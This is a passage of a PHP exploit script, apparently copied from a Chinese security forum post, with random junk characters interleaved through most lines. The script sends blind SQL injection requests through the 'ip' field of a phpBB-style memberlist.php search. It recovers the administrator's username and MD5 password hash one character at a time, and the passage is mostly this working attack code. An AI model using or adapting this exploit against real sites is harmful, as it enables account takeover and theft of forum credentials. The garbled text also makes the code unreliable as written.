    - O( _' o& y4 X$ [; I- A9 jecho "sql -> ".$sql."# l. A7 a( s( o* A' N
    "; $ O' s# E7 a, w2 l
    $sql=urlencode(strtoupper($sql)); 7 ~' v$ Q( N* P2 J
    $data="username="; # t$ T1 s2 R4 E" w0 U( s
    $data.="&amp;icq="; 9 ~6 b& R& v! D1 F0 |# C) p
    $data.="&amp;email=";
    / i  S' ~, Z  j) m- j3 p' P1 E$data.="&amp;aim=";
    + i, d! s6 T2 [% M$data.="&amp;joined_select=lt"; ) {) Z& ]0 q1 t8 Y
    $data.="&amp;joined="; 2 \6 a( B* g) K7 c9 T& X
    $data.="&amp;yahoo=";
    " r" \7 `& y; M) q  l$ C# F" K$data.="&amp;active_select=lt"; 7 h& t+ p7 J4 L, Y
    $data.="&amp;active=";
    + b# e2 S0 `$ [# A- E$data.="&amp;msn="; - m6 D4 K0 n/ i! D( D, z
    $data.="&amp;count_select=eq"; . I+ T2 O' ~- i; o1 [
    $data.="&amp;count="; 3 U5 I$ K. K9 d
    $data.="&amp;jabber="; % }: W9 w0 Y9 W5 W  I, ?* P4 A( B/ J3 r
    $data.="&amp;sk=c";
    0 a' m" A& A7 t$data.="&amp;sd=a";
    6 G: B. i7 `) ]" f$data.="&amp;ip=".$sql; 9 u* d) s5 f1 U  h/ L
    $data.="&amp;search_group_id=0"; & S0 T& i3 J5 z6 T% e! F
    $data.="&amp;submit=Search";
    : d  H2 V! }, p* y3 }$packet="POST ".$p."memberlist.php?joined_select=lt&amp;active_selec t=lt&amp;count_select=eq&amp;sk=c&amp;sd=a&amp;ip=%5C%27&amp;form=post &amp;field=username_list&amp;mode=searchuser&amp;form=post HTTP/1.0
    & l: P$ A3 e% r6 D8 w) [( i9 E"; 3 z& i: L; Y3 X
    $packet.="Content-Type: application/x-www-form-urlencoded% ]: `0 Q. m/ L, e9 ~! B
    "; # s& @: ]# j1 ~: A4 T( R% S
    $packet.="Host: ".$host.". X2 x; `0 T1 y1 Z, r' M
    "; / D1 ?% [/ v8 r( h' c+ z+ A
    $packet.="Content-Length: ".strlen($data)."( L7 H. F! ~; v: @+ y
    "; * ]+ N: I% E  ?' U
    $packet.="Connection: Close
    / ?, M  B$ L. H6 m+ _";
    # s9 Q, \9 X$ P/ I8 x3 s$packet.="Cookie: ".$cookie."
    0 `' y, R5 e  E. Y
    8 ]) L7 @4 a# B";   l1 L4 S% s+ y) P6 o: e2 `
    $packet.=$data; 8 Q9 T8 ]0 p6 ~0 M- P- F! v" e
    sendpacketii($packet);
    7 F1 Z9 X( |1 l& c8 L' Oif (!strstr($html,"No members found for this search criteria")) {$admin.=chr($i);echo "password -> ".$admin."[???]
    4 l& f( p& \8 W& F% B& D";sleep(2);break;}
    " ?7 m# l) \9 E; A+ g8 {}
    - s7 J7 q6 o6 |5 `" k2 kif ($i==255) {die("Exploit failed...");} - U; \$ X4 a7 `$ }, q
    $j++;
    ) k& a4 H+ n4 @4 X} 6 J# w, D6 ^; T* e
    echo "--------------------------------------------------------------------. S* w7 ~2 t  f* ~0 ^
    "; 5 o. ?, S: Z( F+ `
    echo "admin -> ".$admin."
    1 S& c) i( Y2 ^# @4 Q5 L0 a";
    3 ], q1 N( r9 x9 c0 M/ Lecho "password (md5) -> ".$password."
    # B- {, A. s( Z+ V";
    ! r8 M/ H/ c$ D/ i: U9 u7 gecho "--------------------------------------------------------------------  y/ d4 S' K: L; r1 k5 e
    ";
    $ \, G8 j6 W" S5 s5 b/ O6 D& g3 Tfunction is_hash($hash)
    2 L& {- K$ \2 \" @{ 2 h, v  k# n/ S- M
    if (ereg("^[a-f0-9]{32}",trim($hash))) {return true;} & n: ^7 B  @2 K8 j8 f' w4 \3 ?) J
    else {return false;} $ J  M* G! B# o# R/ t
    } 4 x, A( p5 a5 H+ p- p5 S2 l
    if (is_hash($password)) {echo "Exploit succeeded...";}
    , X, }# K* X, ]/ x% eelse {echo "Exploit failed...";}
    ! S2 R# y  g1 \5 I/ c$ @5 h( T* B?>8 O6 u9 U/ _# c, S9 K3 p( }3 m+ J

      L9 n/ X, }. ]
    0 ]1 k* M# p& h3 c) D
    . G5 }' W. X1 E: h4 f, n
    9 F' ?5 @2 [- n  f9 ~, _2 ]' a; H/ w5 j) V0 \, W. x

    ; G; W- h, u0 |  A5 E1 A- v# {# t2 w" N2 D. E
    . ?' Y6 q: `* B$ x+ W
    3 i* u. Z% e0 Y0 T

    8 O' H( _- f9 ?4 X; e. f$ \8 n
    - \3 K) g+ V8 J5 b* A" z2 T( S2 C8 w1 h  E; m, g  A+ m* u

    4 ?4 A  d" D6 e) J+ e6 Z' A
    ) |# Z; ]3 t3 o
    : K+ V3 c# R: U4 ?+ q& m. E9 O5 B$ L- E" P

    ! g# E/ j8 d" a" U# U9 t/ |3 R7 }
    公告:https://www.sitedirsec.com公布最新漏洞,请关注

    TOP

    返回列表